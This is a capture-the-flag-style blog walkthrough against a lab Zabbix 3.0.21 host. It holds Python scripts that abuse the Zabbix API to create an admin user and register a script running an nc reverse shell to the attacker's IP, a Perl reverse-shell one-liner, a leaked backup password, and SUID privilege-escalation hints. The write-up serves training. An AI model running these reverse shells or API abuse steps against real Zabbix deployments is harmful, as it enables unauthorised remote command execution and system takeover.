Dragon
  • 一个纯白的黑客网站,一直在努力,apt的路上,更精彩!
lsh4ckLsh4ck  2019-02-03 11:30 lsh4ck's Blog |   抢沙发  463 
文章评分 0 次,平均分 0.0

Usually scan,nmap+dirb+gobuster+msftcp

find zabbix,ver3.0.21:

think about zabbix has jsrpc.php,any exploit?,json interface is not authorized to access,search it:

python has library named zabbixapi,https://github.com/lukecyca/pyzabbix

EXP. add host:http://blog.chinaunix.net/uid-28309325-id-5176638.html

createuser.py:

#!/usr/bin/env python
 
from pyzabbix import ZabbixAPI
import sys
import logging
 
stream = logging.StreamHandler(sys.stdout)
stream.setLevel(logging.DEBUG)
log = logging.getLogger('pyzabbix')
log.addHandler(stream)
log.setLevel(logging.DEBUG)
zapi = ZabbixAPI("http://10.10.10.108/zabbix")
zapi.login("zapper", "zapper")
print ("Connected to %s" % zapi.api_version() )
 
zapi.do_request('user.create',
            {
        "alias": "lsh4ck",
        "passwd": "lsls",
        "type": 3,
        "usrgrps": [
            {
                "usrgrpid": "11"
            }
 
]
            }
 
)

createscript.py:

The execute script must execute on zabbix agent not on server cuz server its a docker container

#!/usr/bin/env python
 
from pyzabbix import ZabbixAPI
import sys
import logging
 
stream = logging.StreamHandler(sys.stdout)
stream.setLevel(logging.DEBUG)
log = logging.getLogger('pyzabbix')
log.addHandler(stream)
log.setLevel(logging.DEBUG)
zapi = ZabbixAPI("http://10.10.10.108/zabbix")
zapi.login("lsh4ck", "lsls")
print ("Connected to %s" % zapi.api_version() )
 
zapi.do_request('script.create',
                 {
                   
                    'name': 'revshell',
                    'command': 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.XXX 4444 >/tmp/f',
                    'host_acces': 1,
                    'execute_on': 0
 
                            }
               
    )

the panel of script before:

after excute the script:

editor the script,use the stable perl or python to backconnect:
perl -e 'use Socket;$i="x.x.x.x";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'<br />

create events or triggers,filter use any,more hosts possible:

ncat to listen:

find the files of user zapper is permission denied,cat the backup.sh:
/usr/bin/7z a /backups/zapper_backup-$(/bin/date +%F).7z -pZippityDoDah /home/zapper/utils/* &>/dev/null

shell for backup,-p could be the pwd for zapper

zapper can not ssh:

use python to get a interactive shell:

so can use su,input the pwd,login successfully:

get user.txt

search folder:

The only one that runs with root is the service. Actually, the administrator may be negligent. This should be the way to leave a question for us

suid is running by root

download the pdf of writeup



本文为原创文章,版权归所有,欢迎分享本文,转载请保留出处!

lsh4ck
Lsh4ck 关注:0    粉丝:8 最后编辑于:2019-02-22
这个人很懒,什么都没写
×

予人玫瑰,手有余香

打赏 Lsh4ck

打开支付宝扫一扫,即可进行扫码打赏哦

发表评论

表情 格式 链接 私密 签到

扫一扫二维码分享

无觅相关文章插件,快速提升流量